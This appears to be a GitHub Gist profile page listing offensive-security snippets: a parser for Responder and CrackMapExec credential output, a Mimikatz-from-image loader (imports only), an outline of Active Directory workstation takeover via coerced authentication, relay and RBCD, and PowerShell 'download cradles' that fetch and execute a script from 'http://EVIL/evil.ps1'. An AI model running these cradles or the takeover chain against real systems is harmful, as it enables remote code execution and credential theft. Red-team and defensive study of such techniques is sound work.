D4rkz3rO /
Created Sep 24, 2021 — forked from seajaysec/
Parses output from CrackMapExec, CrackMapExtreme, Responder, PCredz, and into aggregate files of hashes and plaintext output
# This script assumes Responder is in /opt/Responder
# Error messages begone!
exec 2>/dev/null
# Hardcoded location for script output files
# Hardcoded location for ntlmrelayx's .sam file output directory
D4rkz3rO / skullkatz.cs
Created Sep 1, 2021
SkullKatz - Execute Mimikatz from an image
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
D4rkz3rO /
Created Jul 26, 2021 — forked from gladiatx0r/
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

View DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
### Keybase proof
I hereby claim:
* I am d4rkz3ro on github.
* I am sageyev ( on keybase.
* I have a public key ASDnFT5MR4aJjCgaAVnamCtGsr0hwBiHFyUmTWyxqeDaZgo
To claim this, I am signing this object: